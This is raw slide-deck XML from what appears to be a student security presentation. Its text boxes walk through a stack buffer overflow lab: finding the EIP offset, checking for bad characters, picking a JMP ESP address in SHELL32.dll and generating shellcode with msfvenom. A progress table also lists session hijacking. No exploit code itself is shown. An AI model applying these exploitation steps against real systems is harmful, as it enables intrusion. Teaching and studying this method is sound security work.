          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="713625" y="3684750"/>
            <a:ext cx="2590800" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="845" name="Google Shape;845;gba014e31c3_0_26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="796025" y="5988000"/>
            <a:ext cx="7936588" cy="588556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="846" name="Google Shape;846;gba014e31c3_0_26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="1611575"/>
            <a:ext cx="39543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Run the python script step1.py to find the value of EIP.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="847" name="Google Shape;847;gba014e31c3_0_26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713625" y="3288275"/>
            <a:ext cx="39543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The EIP value is 37684136.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="848" name="Google Shape;848;gba014e31c3_0_26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713625" y="5247375"/>
            <a:ext cx="54918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Run the metasploit tool to find the pattern offset. Somewhere inside the 240 bytes of the unique string, it finds the exact offset which is 230 bytes.</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At 230 bytes, it is where we can control the EIP.</a:t>
            </a:r>
            <a:endParaRPr>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ba014e31c3_0_37"/>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Buffer overflow (Overwrite the EIP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="855" name="Google Shape;855;gba014e31c3_0_37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="721649" y="1640725"/>
            <a:ext cx="4838001" cy="3167326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="856" name="Google Shape;856;gba014e31c3_0_37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="721638" y="5006650"/>
            <a:ext cx="4981575" cy="1104900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="857" name="Google Shape;857;gba014e31c3_0_37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5608575" y="1702475"/>
            <a:ext cx="3391200" cy="11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In this step2.py script, it will send 230 bytes of “A”s then send 4 bytes of “B”s so the EIP value should become 42424242.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="858" name="Google Shape;858;gba014e31c3_0_37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703225" y="2807375"/>
            <a:ext cx="1653050" cy="444625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="859" name="Google Shape;859;gba014e31c3_0_37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5828275" y="3439300"/>
            <a:ext cx="39543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We have successfully overwrite the EIP.</a:t>
            </a:r>
            <a:endParaRPr>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gba014e31c3_0_47"/>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Buffer overflow (Finding bad characters)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="866" name="Google Shape;866;gba014e31c3_0_47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="796025" y="2666397"/>
            <a:ext cx="3686176" cy="3908127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="867" name="Google Shape;867;gba014e31c3_0_47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6926650" y="2876375"/>
            <a:ext cx="39543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868" name="Google Shape;868;gba014e31c3_0_47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4791674" y="2618325"/>
            <a:ext cx="3686175" cy="2847975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="869" name="Google Shape;869;gba014e31c3_0_47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600713" y="1633825"/>
            <a:ext cx="39543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Run step3.py script. This script will send a bunch of bad characters so we will have to find if any of these characters appears differently in Immunity debugger.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870" name="Google Shape;870;gba014e31c3_0_47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4832875" y="5567425"/>
            <a:ext cx="39543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Right click ESP, Follow in Dump.</a:t>
            </a:r>
            <a:endParaRPr>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gba014e31c3_0_57"/>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Buffer overflow (Finding bad characters)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="877" name="Google Shape;877;gba014e31c3_0_57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="3116650"/>
            <a:ext cx="4701050" cy="1511500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="878" name="Google Shape;878;gba014e31c3_0_57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="16263" r="19929" b="74076"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="2272274"/>
            <a:ext cx="6601175" cy="844376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="879" name="Google Shape;879;gba014e31c3_0_57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="4709325"/>
            <a:ext cx="5945400" cy="9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You can see the characters from 01, 02, 03, 04 and so on. However, up till 09, it appears as 2E instead of 0a. This means that 0a is a bad character.</a:t>
            </a:r>
            <a:endParaRPr>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gba014e31c3_0_65"/>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Buffer overflow (Finding bad characters)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="886" name="Google Shape;886;gba014e31c3_0_65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="795052" y="2357125"/>
            <a:ext cx="4312425" cy="4610700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="887" name="Google Shape;887;gba014e31c3_0_65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795050" y="1551475"/>
            <a:ext cx="39543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Now that we know 0a is a bad character, remove it from the list of bad characters and find any more bad characters.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="888" name="Google Shape;888;gba014e31c3_0_65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5253002" y="2408318"/>
            <a:ext cx="3429000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="889" name="Google Shape;889;gba014e31c3_0_65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5253000" y="3535400"/>
            <a:ext cx="39543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You can see that after 0c, it should be 0d but it appears to be 2E. This means that 0d is another bad character as well.</a:t>
            </a:r>
            <a:endParaRPr>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gba014e31c3_0_74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665610" y="6647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900"/>
              <a:t>Buffer overflow (Finding the JMP ESP address) </a:t>
            </a:r>
            <a:endParaRPr sz="2900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="896" name="Google Shape;896;gba014e31c3_0_74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="983050" y="2041025"/>
            <a:ext cx="2741416" cy="1142900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="897" name="Google Shape;897;gba014e31c3_0_74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="913025" y="3727106"/>
            <a:ext cx="4202875" cy="2875969"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="898" name="Google Shape;898;gba014e31c3_0_74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913025" y="1723075"/>
            <a:ext cx="39543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Click on View, Executable modules.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="899" name="Google Shape;899;gba014e31c3_0_74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1125850" y="3350050"/>
            <a:ext cx="39543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I will be using SHELL32.dll so click on it.</a:t>
            </a:r>
            <a:endParaRPr>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gba014e31c3_0_83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665610" y="6647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Buffer overflow (Finding the JMP ESP address)</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="906" name="Google Shape;906;gba014e31c3_0_83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4688875" y="2034075"/>
            <a:ext cx="3409950" cy="1095375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="907" name="Google Shape;907;gba014e31c3_0_83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4688875" y="3340375"/>
            <a:ext cx="2762250" cy="295275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="908" name="Google Shape;908;gba014e31c3_0_83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="707100" y="2034075"/>
            <a:ext cx="3786225" cy="4622151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="909" name="Google Shape;909;gba014e31c3_0_83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707100" y="1627000"/>
            <a:ext cx="39543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Right click, Search For, Command then find JMP ESP.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="910" name="Google Shape;910;gba014e31c3_0_83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4606325" y="3723300"/>
            <a:ext cx="39543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Take note of the JMP ESP value: 7510FCDB</a:t>
            </a:r>
            <a:endParaRPr>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gba014e31c3_0_93"/>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Buffer overflow (Crafting our payload)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="917" name="Google Shape;917;gba014e31c3_0_93"/>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Put the jmpesp value in your exploit code.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="918" name="Google Shape;918;gba014e31c3_0_93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="750775" y="2369076"/>
            <a:ext cx="3741250" cy="2511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gba014e31c3_0_100"/>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Buffer overflow (Crafting our payload)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="925" name="Google Shape;925;gba014e31c3_0_100"/>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Generate a payload using msfvenom. Then copy the generated shellcode into the exploit file.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="926" name="Google Shape;926;gba014e31c3_0_100"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="324338" y="2883250"/>
            <a:ext cx="8756226" cy="2664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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665163" y="893763"/>
            <a:ext cx="7781925" cy="60483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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Task Allocation and Progress</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244;p7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>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t>Irfan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-139700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="245" name="Google Shape;245;p7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="2358175"/>
          <a:ext cx="7239000" cy="4206000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{E9358BB0-01F0-4BF1-B8BA-4A1BF30B64EC}</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sz="1800" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Task</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibr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US" sz="1800" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Progress</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibr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800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Security Misconfiguration</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnT w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="CFD7E7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnT w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="CFD7E7"/>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800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Improper Session Management - Session Hijacking</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:solidFill>
                      <a:srgbClr val="E8ECF4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:solidFill>
                      <a:srgbClr val="E8ECF4"/>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1800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
